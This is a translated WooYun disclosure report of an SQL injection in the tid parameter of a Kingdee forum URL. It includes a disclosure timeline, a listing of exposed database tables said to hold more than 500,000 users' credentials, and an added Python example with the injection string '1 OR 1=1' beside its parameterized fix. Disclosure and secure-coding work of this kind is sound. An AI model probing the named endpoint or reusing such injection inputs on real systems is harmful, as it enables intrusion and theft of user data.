
Vulnerability summary

Defect ID: wooyun-2015-0139523

Title: SQL injection on a Kingdee site (affects the information of more than 500,000 registered users)

Vendor: Kingdee (金蝶)

Author: 深度安全实验室

Submitted: 2015-09-07 14:48

Fixed: 2015-10-23 08:52

Published: 2015-10-23 08:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-09-07: Details sent to the vendor, awaiting vendor handling
2015-09-08: Vendor confirmed; details disclosed to the vendor only
2015-09-18: Details disclosed to core white hats and experts in related fields
2015-09-28: Details disclosed to regular white hats
2015-10-08: Details disclosed to intern white hats
2015-10-23: Details disclosed to the public

Brief description:

As in the title.

Detailed description:

The following Kingdee community URL is vulnerable to SQL injection; the tid parameter is the injectable one:

http://club.kingdee.com/forum.php?action=recommend&do=subtract&hash=8e01bc2c&mod=misc&tid=1

[Screenshot: 13.png]
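The defect class behind the report is a tid value spliced into SQL text. As an added illustration (not the reporter's or Kingdee's code; the table, column and function names are hypothetical stand-ins for the forum's recommend/subtract handler), the vulnerable pattern beside its hardened form, using Python with an in-memory sqlite3 database:

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for a forum thread table; not the real schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE threads (tid INTEGER PRIMARY KEY, subject TEXT, recommends INTEGER)")
    conn.executemany("INSERT INTO threads VALUES (?, ?, ?)",
                     [(1, "first", 5), (2, "second", 3), (3, "third", 0)])
    return conn


def lookup_thread_vulnerable(conn, tid):
    # The defect class in the report: the raw query-string value becomes part of the
    # SQL text, so whatever the client sends in tid is parsed as SQL, not as a number.
    sql = "SELECT tid, recommends FROM threads WHERE tid=" + tid
    return conn.execute(sql).fetchall()


def is_valid_tid(tid):
    # Allow-list check: a thread id is a non-empty string of ASCII digits greater than zero.
    return tid.isascii() and tid.isdigit() and int(tid) > 0


def lookup_thread_hardened(conn, tid):
    # Two independent layers: reject anything that is not an id, then bind the value
    # as a parameter so the database engine never interprets it as SQL syntax.
    if not is_valid_tid(tid):
        raise ValueError("invalid tid")
    return conn.execute("SELECT tid, recommends FROM threads WHERE tid=?", (int(tid),)).fetchall()


def subtract_recommend_hardened(conn, tid):
    # Parameterized write for the 'do=subtract' step; the endpoint's hash/token check
    # is a separate control and is not modelled here. Returns the number of rows changed.
    if not is_valid_tid(tid):
        raise ValueError("invalid tid")
    cur = conn.execute(
        "UPDATE threads SET recommends = recommends - 1 WHERE tid=? AND recommends > 0",
        (int(tid),))
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    db = make_db()
    tampered = "1 OR 1=1"   # constructed sample of a non-numeric tid value
    print(lookup_thread_vulnerable(db, tampered))   # returns every row, not just thread 1
    print(lookup_thread_hardened(db, "1"))          # [(1, 5)]
    try:
        lookup_thread_hardened(db, tampered)
    except ValueError as err:
        print("rejected:", err)
```

The validation alone is not the fix; the parameterized statement is what removes the injection, and the allow-list check simply turns malformed input into a loggable error before it reaches the database.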

Proof of vulnerability:

[Screenshot: 14.png]

Sensitive information of more than 500,000 users is exposed, including usernames, passwords, e-mail addresses and more:

Database: supesite
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| kuc_members | 529708 | <- forum registered users
| tmp2_kuc_members | 484253 |
| tmp_kuc_members | 484252 |
| kuc_memberfields | 482718 |
| u_member | 429765 |
| ee_group_poll_log | 339672 |
| ee_group_flower_log | 203568 |
| tmp_members | 61336 |
| kuc_pms | 42036 |
| kuc_pm_indexes | 13329 |
| kuc_pm_members | 12587 |
| ee_group_fans | 11615 |
| tmp2_pm_members | 10170 |
| tmp_pm_members | 10170 |
+---------------------------------------+---------+



Remediation:

Copyright notice: when reposting, please credit the source 深度安全实验室@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-09-08 08:50

Vendor reply:

Thank you for your attention to Kingdee security; we have notified the relevant department to handle it.

Latest status:

None yet